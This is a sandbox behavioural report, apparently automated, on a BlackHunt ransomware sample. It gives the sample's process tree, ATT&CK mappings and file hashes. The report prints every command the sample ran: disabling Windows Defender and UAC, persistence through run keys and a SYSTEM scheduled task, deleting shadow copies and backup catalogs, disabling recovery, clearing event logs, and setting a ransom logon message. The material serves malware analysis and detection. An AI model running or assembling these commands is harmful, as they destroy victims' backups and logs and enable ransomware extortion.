PID 4756 wrote to memory of 2860 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 143 PID 4856 wrote to memory of 4612 4856 cmd.exe 140 PID 4856 wrote to memory of 4612 4856 cmd.exe 140 PID 4756 wrote to memory of 4876 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 142 PID 4756 wrote to memory of 4876 4756 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4756 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:3432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:4344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:316 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:3940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1692 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:4612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2584
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:1456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2892
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4876
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3572
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:5036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2300
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:4448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2708
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:4496
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:5076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4396
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3268
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4980
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F2⤵PID:2076
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ddcdb653fd7ce40e1b33e3c8dbdca85bd676b8e445ab59aa91abbdc2e3e8ecb.exe" /F3⤵
- Creates scheduled task(s)
PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3768
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1584
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5052
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:6132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3940
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:6120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3092
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2736
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:6140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1568
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3504
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:2472
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4120
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3420
-
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:5372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6052
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:4636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3384
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:3632
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:960
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:4292
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5976
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5896
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:4828
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3844
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5800
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:4208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:6104
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1312
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:2752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:3504
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:3692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4204
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:5808
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:4336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:5816
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:5776
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:4980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:4552
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:1188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:3568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3156
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6112
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5304
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:6132
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5e2a8ebd58e67e3a76e145f1c634643d4
SHA14041a6acb4fe4f450504df790977d795f62cc2a1
SHA2562353f4d509e250b26c5797a2fc2e292ee68ef170fd304bc8b5d938f006b43de4
SHA5124a96bf01bd15a30a7803268f5f08ea4718349e1845f11ff9725d34087f2415f41a7db5b15b1e7f5c017ddd78aaa1cc74081ed86eb376fbb5c4a3c49eeaa81750
-
Filesize
684B
MD5d9884015db4203a8f477abeed87a53cf
SHA1de52aa0265b66b14af8440af7f1b48a0dbca6539
SHA256c33a9f8ea66ede69be136f170817f4d8926fc63445ea200769358a3c6de8b0af
SHA5124f8b489ed6e3891479241e16cc9728037db001170ceedf7c5419357d77cea7dfde93f0d484a8fc4e5db7a00dc6e34e6c856b06028ae5daba738f8fe9678f1418
-
Filesize
12KB
MD5cfc308bf15b5288285f507af78c6d8d1
SHA1a261c26a3ea5824167ffe40d70ce239b40a3149f
SHA256f454e612544b63d0d65131788e26246c275f73a92e9642290595cc517ea16c27
SHA512a485269141ae07a212ee225fdd84acabd189f33ee37bfa1dd8ab3133342fe586f42d8586df19f8ad9c99893b0fdcfc347f05d9ac9ac4ccb80765096ba74ba4f7